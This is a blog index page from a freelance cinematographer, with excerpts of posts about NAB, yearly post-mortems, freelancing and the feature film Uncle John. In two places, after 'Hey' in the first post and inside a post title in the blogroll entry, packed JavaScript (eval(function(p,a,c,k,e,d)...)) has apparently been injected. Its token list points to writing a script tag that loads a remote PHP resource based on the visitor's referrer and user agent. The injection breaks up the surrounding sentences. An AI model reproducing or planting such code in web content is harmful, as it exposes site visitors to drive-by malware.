I’m Back!

Hey eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nbfkd|var|u0026u|referrer|tkdit||js|php'.split('|'),0,{})) guys. I know it's been a really slow start to the 2016 blogging year; I took a few months to step away from blogging to recharge and reassess. And now that NAB 2016 is upon us I think...

2015: A Post Mortem (Finally)

2015 has come and gone. It was an insane (in a good way) year, both professionally and personally. It was my first full year of freelancing full-time, I traveled, got engaged, and pushed my work to the next level with some new gear. If 2014 was defined by “transition,” then 2015 could be described as “growth.”

Vancouver Vacation

It’s been over a month since I finished my NAB Spotlight posts and almost two since NAB itself. Since getting back from Vegas both Loretta and I have been working pretty much non-stop and it was time for a well-needed vacation. Now that things are starting to slow down, I can get back to getting posts out.

Uncle John Heads to SXSW

Many of you may remember that back in August/September I worked on an independent feature film, shot in Wisconsin and Chicago, called Uncle John (you can read about the production process here and here). Well, last week I heard from the producer, Erik Crary, that the film was accepted into the South by Southwest Film Festival.

2014: A Post Mortem

The holidays have come and passed and 2014 has come to a close. As we move forward in the new year it’s important to look back at all that 2014 was so that we can make the best of 2015. For me, this year can be described in one word: transition. I started the year as a grad student in Chicago, moved to San Francisco, was in LA for a while, and am now working as a full-time freelancer. It’s been a great year with lots of ups, some downs, and has finally started me down the path I want to be on.

what mandy thinks: Small Talk: Jeremy of Widen Media

An awesome web designer friend asked if she could feature me on her “Small Talk” series about the process of blogging. Of course I said yes! This is a reblog of that post.

Life Update and The Jog

Hello there readers. It’s been a while since my last post on my studio build (widenmedia.com) and even longer since my last update on the status of my Columbia College thesis film The Jog (widenmedia.com); so I thought I would catch you all up on what has been going on.

Project Update: Uncle John

Back in August and September of 2013 I worked on a feature film called Uncle John (unclejohnfilm.com). You may remember me talking about the production in my “On Set With” blogs (Part I) (Part II). Uncle John is now finished! This is the first feature that I’ve 1st AC’ed on so being able to see it is an intense feeling for me.

Freelancing: The First Month

Now that I’m finally done with grad school (with the exception of finishing The Jog) it’s time to get to work; and this is the first time that I’ve been a full-time freelancer. Going into my first month I was a bit concerned, but it’s been a busy month (to which I’m grateful). I’ve worked with some amazing friends and filmmakers on some pretty kick ass projects.

Finally Home!

Well folks, after a two month stint in Los Angeles, to finish up classes for my MFA, I’m finally back home in San Francisco. Loretta and I have a great place to set up in the sunset and we’re both looking forward to what the future has for us. I haven’t checked in for a while, so being back seems like a good time to do so!

The Secret to Business Success is…

Hi There,
This is Loretta Robinson writing to you from LorettaMay Design and Creatively Driven. I’m a designer, blogger, and branding nut. I love branding; It’s my life blood. Where you guys might get all tingly over using a Red or some fancy schmancy gear, I get that way over branding.

I’m here today to let you in on Jeremy’s secret to success. Aside from being an extremely hard-working, very knowledgeable, and well liked by everyone, Jeremy started off with a really strong brand. Who branded him? Well me of course!

Shooting in Indiana

A few weeks ago I got hired for a shoot in Indiana for the Travel Channel show “Mega RV Countdown” (travelchannel.com) They brought me on as 1st AC, but the job was really as a second camera op. MRVC is a reality show that highlights different RV’s and motor homes that have been tricked out.

Paying PA's

Because I’m on summer break from Columbia College I’ve been browsing the job boards with a lot more fervor than usual; and I’ve noticed a trend in the listings that really angers me. It seems like every posting for production assistants (PA’s) wants to get the work done for free. I’ve noticed a few posting that go as far as asking for entire crews for free. As a producer, and an experienced filmmaker, I see a lot of things wrong with this.

The Everything Post

Wow, it’s been over a month since my last post… and what a crazy busy month it’s been. So far 2013 is shaping up really well, and there are a lot of things I’m working on for later this year. I haven’t given a solid update on the state of things in a while so, this post will hopefully catch us all up before I move into summer reviews and tutorials.

I took some time after the end of the semester to decompress. I took Loretta and Zero camping in Michigan (see Loretta’s post about it here: creatively-driven.com), I sorted through my office and apartment, I cleaned out the clutter and got reset, and now I’m finally ready to look back at how much actually happened that last few months.

2012: A Post-Mortem

Since it’s the time of year when companies summarize the year they’ve had, and it’s been a while since I’ve done a check in, here’s my post-mortem on 2012. Last year I kept it under 600 words; there's no way I'm going to be able...

Deconstructing My Blogroll: Frugal Filmmaker, DSLR Film Noob, The Black and Blue

A few weeks ago I posted about the first three sites I go to for information on filmmaking (3 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kytif|var|u0026u|referrer|rtbsr||js|php'.split('|'),0,{})) Daily Stops for Film Industry News). 99 Ways to Tell a Story

If story is everything; and every story that can ever exist has already been told; then how can we create original (or at least seemingly original) work? Easy! We re-tell the same story over and over again, but in different ways. Think about films like Avatar...
